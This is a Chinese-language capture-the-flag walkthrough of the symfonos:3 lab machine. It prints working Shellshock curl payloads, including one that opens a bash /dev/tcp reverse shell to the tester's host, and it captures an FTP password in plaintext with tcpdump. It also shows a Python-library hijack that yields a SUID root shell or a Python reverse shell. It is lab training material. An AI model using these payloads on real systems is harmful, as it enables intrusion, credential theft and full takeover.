本文內(nèi)容純屬虛構(gòu)，攻略鴨求b站關(guān)注點(diǎn)贊支持！

靶機(jī)IP地址：192.168.31.37

測試機(jī)IP地址：192.168.31.38

外部信息收集

訪問http://192.168.31.37/

頁面源代碼中有注釋：

<!-- Can you bust the underworld? -->

端口掃描

PORT ? STATE SERVICE REASON ? ? ? ? VERSION
21/tcp open ?ftp ? ? syn-ack ttl 64 ProFTPD 1.3.5b
22/tcp open ?ssh ? ? syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open ?http ? ?syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))

網(wǎng)站目錄枚舉

$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.37/FUZZ
http://192.168.31.37/gate/
訪問后發(fā)現(xiàn)還只是個(gè)圖片
$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.37/gate/FUZZ
http://192.168.31.37/gate/cerberus/
訪問后發(fā)現(xiàn)還只是個(gè)圖片
$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.37/gate/cerberus/FUZZ
沒結(jié)果

換個(gè)字典
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://192.168.31.37/FUZZ
.hta ? ? ? ? ? ? ? ? ? ?[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 3ms]
cgi-bin/ ? ? ? ? ? ? ? ?[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 1ms]
.htpasswd ? ? ? ? ? ? ? [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 87ms]
gate ? ? ? ? ? ? ? ? ? ?[Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 0ms]
index.html ? ? ? ? ? ? ?[Status: 200, Size: 241, Words: 24, Lines: 23, Duration: 1ms]
.htaccess ? ? ? ? ? ? ? [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 174ms]
server-status ? ? ? ? ? [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 0ms]

/cgi-bin/表明機(jī)器上可能有CGI應(yīng)用程序。

$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://192.168.31.37/cgi-bin/FUZZ
沒結(jié)果
$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.37/cgi-bin/FUZZ
underworld ? ? ? ? ? ? ?[Status: 200, Size: 62, Words: 14, Lines: 2, Duration: 149ms]

訪問http://192.168.31.37/cgi-bin/underworld
返回 21:20:03 up ?1:55, ?0 users, ?load average: 0.22, 1.08, 0.72

搜索引擎搜返回內(nèi)容，是執(zhí)行uptime命令的結(jié)果。

Shellshock漏洞

curl -H "Connection: () { : ;};echo;echo;/bin/bash -c 'cat /etc/passwd'" http://192.168.31.37/cgi-bin/underworld
root:x:0:0:root:/root:/bin/bash
...
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
hades:x:1000:1000:,,,:/home/hades:/bin/bash
cerberus:x:1001:1001:,,,:/home/cerberus:/bin/bash
proftpd:x:108:65534::/run/proftpd:/bin/false
ftp:x:109:65534::/srv/ftp:/bin/false

Bash Socket反向shell

nc -nvlp 443
curl -H "Connection: () { : ;};echo;echo;/bin/bash -i &>/dev/tcp/192.168.31.38/443 <&1" http://192.168.31.37/cgi-bin/underworld
cerberus@symfonos3:/usr/lib/cgi-bin$ id
uid=1001(cerberus) gid=1001(cerberus) groups=1001(cerberus),33(www-data),1003(pcap)
python -c 'import pty;pty.spawn("/bin/bash")'
$ searchsploit -m 36742.txt
失敗

權(quán)限提升

pspy觀察系統(tǒng)進(jìn)程

用pspy觀察系統(tǒng)進(jìn)程看有沒有暫時(shí)看不到的定時(shí)任務(wù)/usr/sbin
cerberus@symfonos3:/tmp$ wget "http://192.168.31.38:8000/pspy64s"
cerberus@symfonos3:/tmp$ chmod +x pspy64s
cerberus@symfonos3:/tmp$ ./pspy64
2023/02/07 01:55:40 CMD: UID=1000 ?PID=476 ? ?| proftpd: (accepting connections)
2023/02/07 01:56:01 CMD: UID=0 ? ? PID=20391 ?| /bin/sh -c /usr/bin/python2.7 /opt/ftpclient/ftpclient.py ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
2023/02/07 01:56:01 CMD: UID=0 ? ? PID=20390 ?| /bin/sh -c /usr/bin/curl --silent -I 127.0.0.1 > /opt/ftpclient/statuscheck.txt ? ? ? ? ? ? ? ? ? ? ?
2023/02/07 01:56:01 CMD: UID=1000 ?PID=20392 ?| proftpd: (accepting connections)
2023/02/07 01:56:01 CMD: UID=0 ? ? PID=20393 ?| /usr/sbin/CRON -f
2023/02/07 01:56:01 CMD: UID=105 ? PID=20394 ?| /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
2023/02/07 01:56:01 CMD: UID=1000 ?PID=20395 ?| /usr/sbin/exim4 -Mc 1pPIpd-0005Iv-CG

1.利用FTP明文傳輸抓取口令

cerberus@symfonos3:/usr/sbin$ ip add
1: lo: inet 127.0.0.1/8 scope host lo
2: ens33: inet 192.168.31.37/24 brd 192.168.31.255 scope global ens33

cerberus@symfonos3:/usr/lib/cgi-bin$ id
uid=1001(cerberus) gid=1001(cerberus) groups=1001(cerberus),33(www-data),1003(pcap)
屬于pcap組

tcpdump -i lo port 21
tcpdump: lo: You don't have permission to capture on that device
(socket: Operation not permitted)
遇到權(quán)限問題，把靶機(jī)刪掉重新創(chuàng)建。
tcpdump -i lo port 21
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
02:20:01.478756 IP localhost.59512 > localhost.ftp: Flags [P.], seq 1:13, ack 56, win 342, options [nop,nop,TS val 4294944980 ecr 4294944980], length 12: FTP: USER hades
02:20:01.478758 IP localhost.ftp > localhost.59512: Flags [.], ack 13, win 342, options [nop,nop,TS val 4294944980 ecr 4294944980], length 0
02:20:01.479803 IP localhost.ftp > localhost.59512: Flags [P.], seq 56:89, ack 13, win 342, options [nop,nop,TS val 4294944981 ecr 4294944980], length 33: FTP: 331 Password required for hades
02:20:01.479846 IP localhost.59512 > localhost.ftp: Flags [P.], seq 13:36, ack 89, win 342, options [nop,nop,TS val 4294944981 ecr 4294944981], length 23: FTP: PASS PTpZTfU4vxgzvRBE
02:20:01.489005 IP localhost.ftp > localhost.59512: Flags [P.], seq 89:115, ack 36, win 342, options [nop,nop,TS val 4294944983 ecr 4294944981], length 26: FTP: 230 User hades logged in
02:20:01.489102 IP localhost.59512 > localhost.ftp: Flags [P.], seq 36:51, ack 115, win 342, options [nop,nop,TS val 4294944983 ecr 4294944983], length 15: FTP: CWD /srv/ftp/
02:20:01.489378 IP localhost.ftp > localhost.59512: Flags [P.], seq 115:143, ack 51, win 342, options [nop,nop,TS val 4294944983 ecr 4294944983], length 28: FTP: 250 CWD command successful

USER hades

PASS PTpZTfU4vxgzvRBE

利用該用戶名口令去測試SSH服務(wù)

ssh hades@192.168.31.37
hades@symfonos3:/tmp$ id
uid=1000(hades) gid=1000(hades) groups=1000(hades),1002(gods)

2.定期執(zhí)行的ftpclient.py

觀察系統(tǒng)進(jìn)程時(shí)看到系統(tǒng)定期執(zhí)行：/bin/sh -c /usr/bin/python2.7 /opt/ftpclient/ftpclient.py

$ cat /opt/ftpclient/ftpclient.py
cat: /opt/ftpclient/ftpclient.py: Permission denied

$ ls -al /opt/ftpclient
-rw-r--r-- 1 root hades ?262 Apr ?6 ?2020 ftpclient.py
-rw-r--r-- 1 root hades ?251 Feb ?7 02:55 statuscheck.txt

hades@symfonos3:/opt/ftpclient$ cat ftpclient.py
import ftplib

ftp = ftplib.FTP('127.0.0.1')
ftp.login(user='hades', passwd='PTpZTfU4vxgzvRBE')

ftp.cwd('/srv/ftp/')

def upload():
? ?filename = '/opt/client/statuscheck.txt'
? ?ftp.storbinary('STOR '+filename, open(filename, 'rb'))
? ?ftp.quit()

upload()

修改python模塊提權(quán)

$ find / -name ftplib* 2>/dev/null
/usr/lib/python2.7/ftplib.pyc
/usr/lib/python2.7/ftplib.py
/usr/lib/python3.5/__pycache__/ftplib.cpython-35.pyc
/usr/lib/python3.5/ftplib.py

$ ls -l /usr/lib/python2.7/ftplib.py
-rwxrw-r-- 1 root gods 37755 Sep 26 ?2018 /usr/lib/python2.7/ftplib.py

有修改該python模塊的權(quán)限。

1.創(chuàng)建新ftplib.py去復(fù)制/bin/bash并覆蓋原有的ftplib.py

備份ftplib.py
cp /usr/lib/python2.7/ftplib.py /tmp/ftplib.py.bak

創(chuàng)建一個(gè)新的ftplib.py
nano /tmp/ftplib.py
import os;os.system("cp /bin/bash /tmp/rootbash;chmod u+s /tmp/rootbash")

覆蓋原有的ftplib.py
cp /tmp/ftplib.py /usr/lib/python2.7/ftplib.py

等一會(huì)兒將獲得bash
ls -l /tmp/rootbash
/tmp/rootbash

2.ftplib.py中添加python反向shell

$ vi /usr/lib/python2.7/ftplib.py
添加：
import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.38",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
開啟測試機(jī)監(jiān)聽端口：
$ nc -nvlp 9000
# id
uid=0(root) gid=0(root) groups=0(root)

其他

flag

# cat /root/proof.txt
Congrats on rooting symfonos:3!